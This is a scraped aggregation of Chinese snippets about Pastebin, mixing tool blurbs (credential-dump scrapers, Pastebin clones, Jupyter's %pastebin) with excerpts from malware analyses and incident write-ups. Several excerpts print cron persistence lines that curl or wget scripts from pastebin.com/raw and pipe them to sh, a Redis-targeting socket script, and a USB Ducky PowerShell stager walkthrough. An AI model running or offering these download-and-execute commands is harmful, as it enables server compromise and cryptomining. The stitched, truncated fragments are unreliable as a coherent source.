pepe是一个基于python的用于从Pastebin收集有关泄露电子邮件地址信息的脚本工具。 ? 它会解析Pastebin email:password转储并收集有关每个电子邮件地址的信息。...) `=='' `" ` clover/snark^ http://ascii.co.uk/art/platypus Post Exploitation Pastebin...arguments: -h, --help 显示帮助信息并退出 --file FILE 加载文件 --stream Stream Pastebin...--------------------- ---Google Search---http://[REDACTED]http://[REDACTED]http://[REDACTED]https://pastebin.com...------------------ ---Google Search---https://[REDACTED]https://[REDACTED]https://[REDACTED]https://pastebin.com
,可以访问 pastebin.com 来试用。...1.为什么需要 pastebin ?...一开始,pastebin 主要用来分享代码,程序员写完代码后想给别人看,直接把代码粘贴至 pastebin,然后把 url 发给其他人,其他人点开链接就可以直接看到代码,代码的缩进格式会保持不变,代码评审人员看起来会比较舒服...实际上,任何纯属文本数据都可以通过 pastebin 来共享,比如以下应用场景: 用做一个在线的纯文本文档。 突破限制,发一些长推文。...pastebin 的初衷是对用户友好的,无需注册或者登陆即可使用,而且可以分享超长文本,让用户分享文本变得更容易,目前 pastebin 每月有 1700 万活跃用户。
Satori和Brickerbot攻击中被使用的华为路由器exp被圣诞老人公布在了Pastebin上。...介绍 根据NewSky Security的博客,黑客在Pastebin上公开发布了华为漏洞CVE-2017-17215的exp代码。...Satori僵尸网络代码片段 所有这些信息也存在于pastebin泄露的工作漏洞代码中,如下所示。 漏洞利用代码片段 SOAP问题频出 这不是IoT僵尸网络第一次出现与SOAP协议相关的问题。
filite:简单,轻巧且独立的pastebin,URL shortener和文件共享服务 filite是一个简单,轻巧且独立的pastebin,URL shortener和文件共享服务,可以托管文件,
FreeBuf百科 Pastebin是一个便签类站点,用户可以在该平台任意储存纯文本,例如代码,文字等内容。Pastebin支持的编程语言种类也非常齐全,还会自动判断语言类型并高亮显示代码内容。...但从安全分析和威胁情报的角度来看,Pastebin却是一个信息收集的宝库。特别是那些上传到pastebin却未明确设置为private(需要一个账户)的内容,将会被所有人公开查阅。...我们可以检索pastebin上所有被上传的数据,并筛选出我们感兴趣的数据。这里我要向大家推荐使用一款叫做dumpmon的推特机器人,它监控着众多“贴码网站”的账户转储、配置文件和其他信息。...值得一提的是, Pastebin虽未禁止我们爬取它的数据,但在IP方面却有一定限制,一旦触发IP锁将会被临时甚至永久封禁。 幸运的是,Pastebin为我们提供了一个专门为这种任务所设计的API。...这是一个简单的脚本和一组Yara规则,将从pastebin API获取粘贴,并将任何匹配的粘贴存储到具有漂亮的Kibana前端的elastic搜索引擎中。 ? ?
crontab 被写入了一个定时任务,每半小时左右会从 pastebin 上下载脚本并且执行。 原因 redis 没有启用密码认证。 清理方案 将 redis 服务关闭,并设置密码。...# 防止木马再次下载 echo '127.0.0.1 pastebin.com' >> /etc/hosts # 删除掉局域网服务器之间的免密登录 # 本机定时任务和木马都清理干净了,重启后木马又重新执行...rm -rf ~/.ssh # 先 kill 掉木马进程,不然服务器操作起来极慢 ps -ef|grep pastebin |grep -v grep|awk '{print $2}'|xargs kill...function echocron() { echo -e "*/10 * * * * root (curl -fsSL https://pastebin.com/raw/5bjpjvLP ||...root (curl -fsSL https://pastebin.com/raw/5bjpjvLP || wget -q -O- https://pastebin.com/raw/5bjpjvLP)|
我们的 SpiderLabs 团队发现了在两个不同时间点上传的两篇单独的 Pastebin 帖子,该两篇Pastebin帖子包含的信息,是一些对新保集团的数据库访问操作,其中一篇帖子罗列了Java服务器相关的异常日志...以下是该篇 Pastebin 帖子中,请求日志涉及的其它完整语句参数: ? 经查询分析,目前该篇 Pastebin 帖子已经被上传者删除,可以点此( webcache)查看其谷歌快照。...最终,我们发现攻击者为了隐藏痕迹,已经删除了这篇数据库查询的 Pastebin 帖子,谷歌快照也不存在相关缓存内容,只在Pastebin上存有内容不可见的记录: ? ?...可以说,这种包含错误日志和查询的 Pastebin 帖子,很多时候可能是开发人员之间为了排除故障而进行的相互共享,所以,基于此种原因,我们不能确定到底是谁上传了这些内容到Pastebin,也不清楚其实际意图...,以进行故障排除; 第三种场景是,可能与攻击毫无关联,仅只是某位内部开发人员为了进行故障排除而上传到Pastebin的。
/raw/CnPtQ2tM -o /usr/local/bin/dns||wget https://pastebin.com/raw/CnPtQ2tM -O /usr/local/bin/dns) &&.../raw/1NtRkBc3||wget -q -O- https://pastebin.com/raw/1NtRkBc3)|sh\n##" > /etc/cron.d/apache && touch -.../raw/1NtRkBc3||wget -q -O- https://pastebin.com/raw/1NtRkBc3)|sh\n##" > /var/spool/cron/root && touch.../raw/1NtRkBc3||wget -q -O- https://pastebin.com/raw/1NtRkBc3)|sh\n##" > /var/spool/cron/crontabs/root.../raw/1NtRkBc3||wget -q -O- https://pastebin.com/raw/1NtRkBc3)|sh' & done fi touch -acmr /bin/
该脚本通过crontab持久控制,并从Pastebin下载更多的Monero Miner模块。 该脚本末尾的部分如下: ?...然后二进制文件从Pastebin中检索其C2服务器: ? .onion C2服务器地址以硬编码存储在二进制文件中,并用作后备。...我们可以根据对Pastebin链接的访问次数来估计受感染的受害者数量: ? 如上所示,大约有4,500个端点访问了Pastebin链接。...一旦发现易受攻击的服务存在漏洞利用模块,二进制文件就会调用对应漏洞并安装Pastebin上托管的恶意bash脚本来进行传播。...[.]com/raw/Dj3JTtnj https://pastebin[.]com/raw/p3mGdbpq https://pastebin[.]com/raw/UeynzXEr https://pastebin
:https://www.reddit.com/r/rust/comments/p99e80/rust_simd_native_vs_clibary/ sweetpaste 一个用 Rust 实现的 pastebin...pastebin 是一种在线内容托管服务,用户可以在其中存储纯文本。...第一个pastebin是同名的pastebin.com。 sweetpaste 是一个简单的 pastebin 服务器,它是一个纯服务端的程序,没有任何客户端代码。
从 hxxps://pastebin.com/raw/eRkrSQfE 获取 base64 编码的内容,解码后执行。解码内容如下: ?...站点 hxxps://pastebin.com/raw/5bjpjvLP,内容如下: ?...二、攻击者信息 通过攻击者使用的 pastebin 站点的 URL 进行分析,发现使用的用户名为 SYSTEMTEN, 地址为 hxxps://pastebin.com/u/SYSTEMTEN ?...五、附录 IOCs: ● IP 103.87.9.40 167.99.8.184 ● URL https://pastebin.com/raw/9VbG2qrD https://pastebin.com.../raw/KqzUfgz0 https://pastebin.com/raw/SGM25Vs3 https://pastebin.com/raw/cAfrnxHu https://pastebin.com
该组织有12步操作的特点,自Rocke首次报道以来,该风格保持一致: 1、攻击者将第一个有效负载上传到第三方站点(例如,Pastebin,GitHub) 2、引诱受害者导航到Pastebin / GitHub...样本还包含与已知Rocke报告的Pastebin URL的硬编码链接: hxxps://pastebin[.]com/raw/HWBVXK6H hxxps://pastebin[.]com/raw/60T3uCcb...hxxps://pastebin[.]com/raw/rPB8eDpu hxxps://pastebin[.]com/raw/wR3ETdbi hxxps://pastebin[.]com/raw/Va86JYqw...Rocke通信模式 研究人员试图确定是否可以使用NetFlow数据识别从Pastebin下载的初始有效负载。研究人员发现,共有50个组织与Pastebin建立了网络连接。...在这50个组织中,有8个组织在与Rocke域的连接的同一小时内与Pastebin建立了网络连接。
/raw/5bjpjvLP||wget -q -O- https://pastebin.com/raw/5bjpjvLP)|sh\\n\\n\\n"\r\n') s.send.../raw/5bjpjvLP||wget -q -O- https://pastebin.com/raw/5bjpjvLP)|sh\\n\\n\\n"\r\n') s.send...#如果 /bin/httpdns成立,则下载 https://pastebin.com/raw/Fj2YdETv 脚本,并赋予 755权限,此处为wget安装 fi if [.../raw/5bjpjvLP||wget -q -O- https://pastebin.com/raw/5bjpjvLP)|sh\n##" > /etc/cron.d/root #定期执行下载任务输出到...-e "*/23 * * * *(curl -fsSL https://pastebin.com/raw/5bjpjvLP||wget -q -O- https://pastebin.com/raw/5bjpjvLP
关于PasteMonitor PasteMonitor是一款针对Pastebin的数据爬取工具,该工具可以通过爬取Pastebin API来收集站点上用户每天发布的Paste。...我们还可以在自己的电脑或服务器上通过Paste的ID来寻找到Paste内容(下图中的Paste ID为“WJq2YxPg”): 工具准备 在开始使用PasteMonitor之前,我们需要准备好下列内容: 1、获取一个Pastebin...项目地址 https://github.com/pixelbubble/PasteMonitor 参考资料 https://pastebin.com/doc_scraping_api https://pastebin.com
声东击西:在3秒内执行Pastebin 步骤1:BASE64解码STAGER ?...步骤2:将stager上传至Pastebin 将Base64解码的PowerShell复制粘贴至Pastebin并且保存原始路径。确保使用安全的https链接以避免检测。.../raw/ani8ic5X')" ENTER 下载pastebin-payload.txt,使用自己的方式交换Pastebin链接。...这里我们还将使用相同的Pastebin传送系统,首先我们要做的是准备好Ducky USB驱动器。...为了增加攻击的更加隐蔽性,在这里我建议大家尽可能的使用自己的基础设施/托管而不是Pastebin,因为许多这类比较知名的网站,在企业网络环境中极易被阻断和隔离。
代码墙是基于 pastebin 开源系统搭建而成的代码分享网站。 pastebin 系统的主要功能是在线代码分享,大家可以很容易的张贴自己的代码去分享,去寻求帮助,或者说供其他网友分析,找错等。...但是 pastebin 一个很大的问题是不支持中文。icyleaf 就对其进行了改造,添加了如下的功能:永久化链接,并且美化了系统,增加了一些功能。形成了现在的代码墙。
个cpu信息,默认是4个 排错 排查发现crontab异常 [root@VM_3_114_centos ~]# crontab -l */15 * * * * (curl -fsSL https://pastebin.com.../raw/xmxHzu5P||wget -q -O- https://pastebin.com/raw/xmxHzu5P)|sh 先简单解决问题 重命名curl wget yum等工具,然后停止cron...服务,删除crontab任务并禁锢cron任务中root文件,并修改host伪造pastebin.com解析,问题暂时得到了解决 然后分析问题 手工试了下这个脚本的威力,具体的也可以访问这个网站查看 https...://pastebin.com/raw/xmxHzu5P ,这里会***启动文件/usr/sbin/kerberods 后来网上查了下该病毒短时间内即造成大量 Linux 主机沦陷,它的传播方式分为三种...未授权访问和弱密码这两种常见的配置问题进行控制它们执行恶意命令 利用 SSH 弱密码进行爆破,然后控制它们执行恶意命令 [root@VM_3_114_centos tmp]# wgetold -q -O- https://pastebin.com
让我们来看看在常见的数据分析任务中可能有用的一些方法: % pastebin %pastebin将代码上载到pastebin并返回url。...Pastebin是一个在线内容托管服务,我们可以在其中存储纯文本,如源代码片段,然后url可以与他人共享。事实上,Github gist也类似于pastebin,尽管有版本控制。...考虑一个包含以下内容的python script file.py: 1#file.py 2def foo(x): 3 return x 使用Jupyter笔记本中的%Pastebin生成Pastebin
接下来看一些在常见数据分析任务中可能用到的命令: % pastebin %pastebin将代码上传到Pastebin并返回url。...Pastebin是一个在线内容托管服务,可以存储纯文本,如源代码片段,然后通过url可以与其他人共享。事实上,Github gist也类似于pastebin,只是有版本控制。...#file.py def foo(x): return x 在Jupyter Notebook中使用%pastebin生成一个pastebin url。 ?
插入的是下面这个恶意代码,这个代码的意思是,每隔一分钟,就解密执行一次https://pastebin.com/raw/xvfxprtb的代码。 ?...从上面几个漏洞攻击和密码爆破的方式来看,攻击最后的目的都是为了执行命令:’curl -fsSLhttps://pastebin.com/raw/xvfxprtb) | base64 -d) | sh’,...pastebin.com/raw/xvfxprtb的代码如下,是经过base64加密的。 ?...事件追踪 回到刚刚的网址:pastebin.com/raw/xvfxprtb,对其进行追踪,将网址中的raw去掉,就可以看到该代码的发布者了,从下图中可以得知,该作者为NIDAYE222,代码是6月10
领取专属 10元无门槛券
手把手带您无忧上云
云服务器
即时通信 IM
ICP备案
对象存储
实时音视频
